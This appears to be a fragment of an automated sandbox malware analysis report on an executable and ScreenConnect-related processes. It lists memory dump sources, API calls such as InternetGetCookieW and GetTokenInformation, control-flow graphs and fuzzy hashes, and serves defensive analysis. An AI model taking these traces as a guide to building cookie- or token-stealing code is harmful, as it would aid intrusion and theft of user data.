                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                • Opcode ID: 99712e1f825c8d91360618ae0812bba03f40f4a47288c4200e5c274e30e91319
                                                                                                                                                                                • Instruction ID: 41bf6ddcd752e1abcc1c1828036d8ab8a0c7477f2ae3dbb8fecf116e57155adf
                                                                                                                                                                                • Opcode Fuzzy Hash: 99712e1f825c8d91360618ae0812bba03f40f4a47288c4200e5c274e30e91319
                                                                                                                                                                                • Instruction Fuzzy Hash: F7014432644604AB8212A6302C45F2B366EBBC177FB280024FF29D21C2FF68AC8D7021

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 470 f56176-f56181 471 f56183-f5618b 470->471 472 f561dc-f561de 470->472 473 f56194-f5619d 471->473 474 f5618d-f56193 call f54869 471->474 476 f561a6-f561af 473->476 477 f5619f-f561a5 call f54869 473->477 474->473 480 f561b1-f561b7 call f54869 476->480 481 f561b8-f561c1 476->481 477->476 480->481 484 f561c3-f561c9 call f54869 481->484 485 f561ca-f561d3 481->485 484->485 485->472 486 f561d5-f561db call f54869 485->486 486->472
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00F5618E
                                                                                                                                                                                  • Part of subcall function 00F54869: HeapFree.KERNEL32(00000000,00000000,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?), ref: 00F5487F
                                                                                                                                                                                  • Part of subcall function 00F54869: GetLastError.KERNEL32(?,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?,?), ref: 00F54891
                                                                                                                                                                                • _free.LIBCMT ref: 00F561A0
                                                                                                                                                                                • _free.LIBCMT ref: 00F561B2
                                                                                                                                                                                • _free.LIBCMT ref: 00F561C4
                                                                                                                                                                                • _free.LIBCMT ref: 00F561D6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 618c4d2d77783c8977bf7bf926b926e26ea57c49b7ab08877ad00f4388626e12
                                                                                                                                                                                • Instruction ID: b53a97920d771a02eff2d148c20866c6be9f3542a07aae3a0bade84d46aa5d3b
                                                                                                                                                                                • Opcode Fuzzy Hash: 618c4d2d77783c8977bf7bf926b926e26ea57c49b7ab08877ad00f4388626e12
                                                                                                                                                                                • Instruction Fuzzy Hash: EBF0AF32A00604AF8660EB15F881C2A37ECBB50B263A80C05FA39CB452CA65FC84A650
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00F53DAD
                                                                                                                                                                                  • Part of subcall function 00F54869: HeapFree.KERNEL32(00000000,00000000,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?), ref: 00F5487F
                                                                                                                                                                                  • Part of subcall function 00F54869: GetLastError.KERNEL32(?,?,00F5620D,?,00000000,?,00000000,?,00F56234,?,00000007,?,?,00F5669F,?,?), ref: 00F54891
                                                                                                                                                                                • _free.LIBCMT ref: 00F53DBF
                                                                                                                                                                                • _free.LIBCMT ref: 00F53DD2
                                                                                                                                                                                • _free.LIBCMT ref: 00F53DE3
                                                                                                                                                                                • _free.LIBCMT ref: 00F53DF4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                • Opcode ID: 85d31d7d54b0fc3dcbc6d80140d0b7116e3e4cc234b13ea8b91d5da26052f0c2
                                                                                                                                                                                • Instruction ID: 170258c8c1e3f8d8bc415abe4126dacd0c89a033584a610d307423c48c1444fd
                                                                                                                                                                                • Opcode Fuzzy Hash: 85d31d7d54b0fc3dcbc6d80140d0b7116e3e4cc234b13ea8b91d5da26052f0c2
                                                                                                                                                                                • Instruction Fuzzy Hash: 43F05E788046688FC7916F19FC114093B70BB5676630C0217FE329A3B2CBB51999BFC2
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\pzPO97QouM.exe,00000104), ref: 00F52F93
                                                                                                                                                                                • _free.LIBCMT ref: 00F5305E
                                                                                                                                                                                • _free.LIBCMT ref: 00F53068
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                • String ID: C:\Users\user\Desktop\pzPO97QouM.exe
                                                                                                                                                                                • API String ID: 2506810119-3153580935
                                                                                                                                                                                • Opcode ID: 25f60e68bb6f310b6cbdbea5c60cd7f19e809f8a501e0cd2028f805eda75e6c3
                                                                                                                                                                                • Instruction ID: 33755a12c1171924b7b89f33c2c6203349fc61ce3317d7ec1694399a4e09ce8d
                                                                                                                                                                                • Opcode Fuzzy Hash: 25f60e68bb6f310b6cbdbea5c60cd7f19e809f8a501e0cd2028f805eda75e6c3
                                                                                                                                                                                • Instruction Fuzzy Hash: C731BD71E00308AFCB21DB99DC809AEBBFCEB85756F144066FE0497251D6B49A48EB91
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F52594,00000000,?,00F61B50,?,?,?,00F52737,00000004,InitializeCriticalSectionEx,00F5BC48,InitializeCriticalSectionEx), ref: 00F525F0
                                                                                                                                                                                • GetLastError.KERNEL32(?,00F52594,00000000,?,00F61B50,?,?,?,00F52737,00000004,InitializeCriticalSectionEx,00F5BC48,InitializeCriticalSectionEx,00000000,?,00F524C7), ref: 00F525FA
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F52622
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                                • Opcode ID: 92be83f95160aea014da04fb2e304b8575bef41d69ee27c5aea80389b2c6cde1
                                                                                                                                                                                • Instruction ID: 13f4262fff7b361388cec706459cefceec0044b6614441535a10564922628bd5
                                                                                                                                                                                • Opcode Fuzzy Hash: 92be83f95160aea014da04fb2e304b8575bef41d69ee27c5aea80389b2c6cde1
                                                                                                                                                                                • Instruction Fuzzy Hash: C9E04831640308BBDF111B60EC06F593F54AB11B63F104420FF0DE44E1E7A1E958B545
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00F55784,00000000,00000000,00000000,00000000,?,00F55981,00000006,FlsSetValue), ref: 00F5580F
                                                                                                                                                                                • GetLastError.KERNEL32(?,00F55784,00000000,00000000,00000000,00000000,?,00F55981,00000006,FlsSetValue,00F5C4D8,FlsSetValue,00000000,00000364,?,00F544F6), ref: 00F5581B
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F55784,00000000,00000000,00000000,00000000,?,00F55981,00000006,FlsSetValue,00F5C4D8,FlsSetValue,00000000), ref: 00F55829
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                • Opcode ID: 1a1c51ccc4c09cae1422c535b69f172468eaf3b4abd6e45cb720a08d856fefbd
                                                                                                                                                                                • Instruction ID: 202971f2ec3f4ce2061cb0588ebad11d93f46b4271f54b3f5b206c662b6e2d08
                                                                                                                                                                                • Opcode Fuzzy Hash: 1a1c51ccc4c09cae1422c535b69f172468eaf3b4abd6e45cb720a08d856fefbd
                                                                                                                                                                                • Instruction Fuzzy Hash: 2101AC33A05B26EBC7214A68AC54A577798AF05FB37150524FF16D7180D720D808E6E0
                                                                                                                                                                                APIs
                                                                                                                                                                                • _free.LIBCMT ref: 00F54A27
                                                                                                                                                                                  • Part of subcall function 00F5474D: IsProcessorFeaturePresent.KERNEL32(00000017,00F5473C,00000000,?,00000004,00000000,?,?,?,?,00F54749,00000000,00000000,00000000,00000000,00000000), ref: 00F5474F
                                                                                                                                                                                  • Part of subcall function 00F5474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00F54771
                                                                                                                                                                                  • Part of subcall function 00F5474D: TerminateProcess.KERNEL32(00000000), ref: 00F54778
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.3001736513.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.3001721154.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001753306.0000000000F5B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001770543.0000000000F61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.3001785750.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_f50000_pzPO97QouM.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                                • API String ID: 2667617558-3972193922
                                                                                                                                                                                • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                • Instruction ID: e1abc2c1664f5bff71158ee8a35d8f1713492ce29ec40c6fd5c12a4ab1c0d525
                                                                                                                                                                                • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                • Instruction Fuzzy Hash: 0851D371E00209AFDF14CFA8CC81AAEB7F4EF48319F244069EA54E7341E635AE45AB50

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:17.6%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:17
                                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                                execution_graph 39698 7ff848f2993b 39699 7ff848f29934 39698->39699 39699->39698 39700 7ff848f299fe CreateFileW 39699->39700 39701 7ff848f29a7c 39700->39701 39702 7ff848f2d792 39705 7ff848f2d7bf 39702->39705 39703 7ff848f2d92b InternetGetCookieW 39704 7ff848f2d989 39703->39704 39705->39703 39705->39705 39706 7ff848f5abd3 39707 7ff848f5abdf 39706->39707 39709 7ff848f5af32 39707->39709 39711 7ff848f21608 39707->39711 39710 7ff848f5b0f2 39713 7ff848f21611 39711->39713 39712 7ff848f21683 39712->39710 39713->39712 39714 7ff848f21802 LoadLibraryExW 39713->39714 39715 7ff848f21836 39714->39715 39715->39710
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.3919000992.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff848f20000_dfsvc.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CookieInternet
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 930238652-0
                                                                                                                                                                                • Opcode ID: 479dfd0ef6af9b66596c58ceb7d028139e507d570ca72a88c0c9b2451f654c0c
                                                                                                                                                                                • Instruction ID: 51c73caaab830f3c5017c1a79792e510bd13bea3560670a494263cad7a6a30ec
                                                                                                                                                                                • Opcode Fuzzy Hash: 479dfd0ef6af9b66596c58ceb7d028139e507d570ca72a88c0c9b2451f654c0c
                                                                                                                                                                                • Instruction Fuzzy Hash: BE91EE3050CA8D4FEB69EF28D8557E93BE1FF59311F04426BE84EC7292CB75A8458B81
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.3919000992.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff848f20000_dfsvc.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                • Opcode ID: 09bd63c45962fd8a03d1dbf09509ff57221f967534afb38bbdda5379ed5b79c4
                                                                                                                                                                                • Instruction ID: 091941ee68956c32e5bae30edc99410aca3b19dbce8ec3979ca9911bf9443c5a
                                                                                                                                                                                • Opcode Fuzzy Hash: 09bd63c45962fd8a03d1dbf09509ff57221f967534afb38bbdda5379ed5b79c4
                                                                                                                                                                                • Instruction Fuzzy Hash: D0710631A0DA8A5FE789EB7C98092B97BE1EF95350F08417AC00DC72D2DF29A8458745
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.3919000992.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff848f20000_dfsvc.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                • Opcode ID: cb597253eab148bf069d1eb75326cbbcddd612cba0bf5b70664827e23ca6345f
                                                                                                                                                                                • Instruction ID: aa1aa785fa2d0ac4d18bbe0ac947b3eba1e68f765aea7d14babf3c16dd2c4138
                                                                                                                                                                                • Opcode Fuzzy Hash: cb597253eab148bf069d1eb75326cbbcddd612cba0bf5b70664827e23ca6345f
                                                                                                                                                                                • Instruction Fuzzy Hash: 2051D23190CA5C8FDB58EF68E845BA9BBE0FF59310F0441AEE04DD3252CB35A845CB95
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.3918382513.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff848e0d000_dfsvc.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c469084570b3ba7a21a1b05684d47ceedabe431269d9b19a6ceef16a1ab9913a
                                                                                                                                                                                • Instruction ID: 6740b6760a02596feb440c03f02514f9e078908f1a25c13abf12a8b3e84cf104
                                                                                                                                                                                • Opcode Fuzzy Hash: c469084570b3ba7a21a1b05684d47ceedabe431269d9b19a6ceef16a1ab9913a
                                                                                                                                                                                • Instruction Fuzzy Hash: EE41F27080DBC58FE3569B2898459623FF0FF57360B1506EFD088CB1A7D629A846C7A2

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:14.4%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:12
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 10479 7ff848f084b8 10480 7ff848f084bf SetProcessMitigationPolicy 10479->10480 10482 7ff848f08552 10480->10482 10483 7ff848f0f67b 10484 7ff848f0f687 CreateFileW 10483->10484 10486 7ff848f0f7bc 10484->10486 10487 7ff848f04880 10488 7ff848f04889 GetTokenInformation 10487->10488 10490 7ff848f1f2d7 10488->10490 10491 7ff848f03dfa 10492 7ff848f1f470 CloseHandle 10491->10492 10494 7ff848f1f4eb 10492->10494

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 192 7ff848f04880-7ff848f048d9 199 7ff848f048dc 192->199 199->199 200 7ff848f048de-7ff848f04949 199->200 208 7ff848f0494c 200->208 208->208 209 7ff848f0494e-7ff848f1f2d5 GetTokenInformation 208->209 215 7ff848f1f2dd-7ff848f1f30e 209->215 216 7ff848f1f2d7 209->216 216->215
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2475527167.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationToken
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4114910276-0
                                                                                                                                                                                • Opcode ID: b9a1238f86ec57220555ff9b52b8468dda203397046ddbb4374359040131bcd2
                                                                                                                                                                                • Instruction ID: 030a0432b2aa03d652ffcccc4ca2c8f2a22a0e2021fc5f66f933ed8a5511f5e2
                                                                                                                                                                                • Opcode Fuzzy Hash: b9a1238f86ec57220555ff9b52b8468dda203397046ddbb4374359040131bcd2
                                                                                                                                                                                • Instruction Fuzzy Hash: A0611B72E0DAC54FE3199B6C68052B97BE1FFA6718F1801BFD048871DBDA389D058395

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 218 7ff848f0f67b-7ff848f0f710 223 7ff848f0f71a-7ff848f0f7ba CreateFileW 218->223 224 7ff848f0f712-7ff848f0f717 218->224 226 7ff848f0f7bc 223->226 227 7ff848f0f7c2-7ff848f0f7f5 223->227 224->223 226->227
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2475527167.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                • Opcode ID: 1e471de03b745b2d1606fa709634e4f7743ca2f8969aa1355c296a71e600dbb5
                                                                                                                                                                                • Instruction ID: 143abc95f79f0e2dcc060d3a761a456bf69ab5399aaaa54bbece744665a0f07f
                                                                                                                                                                                • Opcode Fuzzy Hash: 1e471de03b745b2d1606fa709634e4f7743ca2f8969aa1355c296a71e600dbb5
                                                                                                                                                                                • Instruction Fuzzy Hash: B351B23190CA5C9FDB58EF58D845BE9BBE0FB59310F1442AEE44DD3292DB34A885CB81

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 229 7ff848f084b8-7ff848f08550 SetProcessMitigationPolicy 232 7ff848f08558-7ff848f08587 229->232 233 7ff848f08552 229->233 233->232
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2475527167.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1088084561-0
                                                                                                                                                                                • Opcode ID: a00f71f1360ab9984c357599b2ab76e6b40d62658680d2b4cdcc52ce9cb67918
                                                                                                                                                                                • Instruction ID: 972cc4d727ee8d078c031c8eda9dd7899b027790a62c85648558c191f9646bf7
                                                                                                                                                                                • Opcode Fuzzy Hash: a00f71f1360ab9984c357599b2ab76e6b40d62658680d2b4cdcc52ce9cb67918
                                                                                                                                                                                • Instruction Fuzzy Hash: C831C53191CB188FDB28AF9C9C4A5F97BE0EB55711F00413EE049D3652DB74A8458B85

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 235 7ff848f03eaa-7ff848f084ef 237 7ff848f084f6-7ff848f08550 SetProcessMitigationPolicy 235->237 238 7ff848f08558-7ff848f08587 237->238 239 7ff848f08552 237->239 239->238
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2475527167.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MitigationPolicyProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1088084561-0
                                                                                                                                                                                • Opcode ID: 6c7750b72b704d6d1501bc4c601a05b23ff4a281436cd0715813489055032e9f
                                                                                                                                                                                • Instruction ID: 45ec69a0a0197159bb44043d5f5f0a7e7cea61e5586f5d73d0e1903caf9c17de
                                                                                                                                                                                • Opcode Fuzzy Hash: 6c7750b72b704d6d1501bc4c601a05b23ff4a281436cd0715813489055032e9f
                                                                                                                                                                                • Instruction Fuzzy Hash: AC21D53191CB188FDB18AF9CDC4AAFA7BE0EB59711F00413EE04AD3651DB74B8458B95

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 339 7ff848f03dfa-7ff848f1f4e9 CloseHandle 342 7ff848f1f4eb 339->342 343 7ff848f1f4f1-7ff848f1f51f 339->343 342->343
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2475527167.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848f00000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                • Opcode ID: da9dbe03fb70af212031e4afd9b03477a9ba81f7308579859b18c2fd2c27d87f
                                                                                                                                                                                • Instruction ID: 75b73ff2f4591a2534c0258a70bfc484c10ee4e067baea6f84b65be19dbee008
                                                                                                                                                                                • Opcode Fuzzy Hash: da9dbe03fb70af212031e4afd9b03477a9ba81f7308579859b18c2fd2c27d87f
                                                                                                                                                                                • Instruction Fuzzy Hash: 4721C131908A1C9FDB58DF98C449BF9BBE0FBA5321F00422ED04ED3651DB74A856CB90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: nCuq$
                                                                                                                                                                                • API String ID: 0-3867085953
                                                                                                                                                                                • Opcode ID: d2e4309d220b76adc14ad2611d6d4dbaec58b5af22649feab21017ea6e0ba24d
                                                                                                                                                                                • Instruction ID: 254c87fd4495bbc13ff18370abeb0e5a3624c12b0199c6a814b2e87b0e0d6963
                                                                                                                                                                                • Opcode Fuzzy Hash: d2e4309d220b76adc14ad2611d6d4dbaec58b5af22649feab21017ea6e0ba24d
                                                                                                                                                                                • Instruction Fuzzy Hash: 1351A1317006018FE715EB38D965AAE7BF6EF88304B1444A9D506DB3A6EF39DC06CB91
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
